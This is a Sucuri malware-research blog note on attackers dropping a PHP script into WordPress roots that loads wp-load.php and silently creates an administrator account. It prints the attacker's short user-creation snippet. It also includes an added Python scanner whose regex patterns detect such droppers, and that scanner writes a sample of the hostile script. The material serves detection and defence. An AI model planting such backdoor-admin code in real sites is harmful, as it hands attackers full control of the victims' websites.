Sucuri Blog

Website Security News

Labs Note

Attackers Silently add new user with Administrator role to WordPress sites

March 16, 2017 | Yuliyan Tsvetkov

Attackers keep getting smarter, both at gaining access to your WordPress site and at avoiding detection. They use legitimate functions of the WordPress core to create users, post spammy content, and carry out other kinds of malicious activity.

In most cases where legitimate functions are used, attackers avoid combining them with obfuscation techniques, which reduces the chances of being detected by antivirus solutions and regular scanners.

One case that we recently researched was just like that. The attacker placed a PHP script inside the root directory of the WordPress installation and included the wp-load.php file, which gave the script access to the core functions.

    $wp_load_loc = "wp-load.php";
    require_once($wp_load_loc);

After loading the file, it is easy to create a WordPress user and set the role to administrator via the core functions.

    $user_id = wp_create_user('username987', 'password987');
    $user = new WP_User($user_id);
    $user->set_role('administrator');

Having the administrator role gives attackers unlimited possibilities to harm your site and business. They can lock you out of the backend, and if you don’t log in very often or perform any security checks, these bogus ‘Administrator’ users could go undetected for a long time.
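One way to look for scripts like the one above is to flag any PHP file that combines all three behaviours shown in the snippets: it references wp-load.php, creates a user, and assigns the administrator role. This is an added example, not code from the original note or from Sucuri; the regexes, function names, and the file name cache-check.php are assumptions made for illustration, and the sample tree is constructed.

```python
import re
import tempfile
from pathlib import Path

# Indicators drawn from the two snippets in this note. The regexes are this
# example's assumptions, not Sucuri signatures.
INDICATORS = {
    # The sample hides the file name in a variable, so match the string
    # literal anywhere rather than only inside the require statement.
    "loads_wp_core": re.compile(r"""["'][^"']*wp-load\.php["']"""),
    "creates_user": re.compile(r"\bwp_(?:create|insert)_user\s*\("),
    "grants_admin": re.compile(
        r"""set_role\s*\(\s*["']administrator["']|["']role["']\s*=>\s*["']administrator["']"""
    ),
}

def scan_file(path):
    """Return the set of indicator names found in one PHP file."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

def find_admin_droppers(wp_root):
    """List PHP files that bootstrap WordPress, create a user and grant admin."""
    hits = []
    for php in sorted(wp_root.rglob("*.php")):
        if scan_file(php) == set(INDICATORS):
            hits.append(php.relative_to(wp_root))
    return hits

def build_sample_site(root):
    """Constructed sample tree: one script like the note's, two benign files."""
    (root / "wp-content" / "plugins" / "demo").mkdir(parents=True)
    (root / "cache-check.php").write_text(  # hypothetical file name
        '<?php $wp_load_loc = "wp-load.php";require_once($wp_load_loc);'
        "$user_id = wp_create_user('username987', 'password987');"
        "$user = new WP_User($user_id);$user->set_role('administrator');"
    )
    # Benign: loads core but never touches users.
    (root / "wp-cron.php").write_text("<?php require_once __DIR__ . '/wp-load.php';")
    # Benign: creates a subscriber from inside a plugin, no bootstrap.
    (root / "wp-content/plugins/demo/signup.php").write_text(
        "<?php $id = wp_insert_user(['user_login' => $l, 'role' => 'subscriber']);"
    )

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(Path(tmp))
        for hit in find_admin_droppers(Path(tmp)):
            print("review:", hit)
```

A match is a lead for manual review, not a verdict. A script that has already run and been deleted leaves only the user behind, so the list of administrator accounts still needs to be checked separately.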

If you’ve noticed any suspicious activity, or your website recently got blacklisted, this could be an indication that something is wrong. We highly recommend contacting a professional to investigate the issues for you.

Categories: Sucuri Labs, Website Malware Infections, WordPress Security
Tags: Hacked Websites, Labs Note

About Yuliyan Tsvetkov

Yuliyan is a Malware Researcher at Sucuri. He is always somewhere on the Internet digging for new malware and, in the meantime, helping to extend the benchmarks for the PCI-DSS standard. In his free time you can find him skiing in the big mountains. Find him on Twitter @yuliyantsvetkov
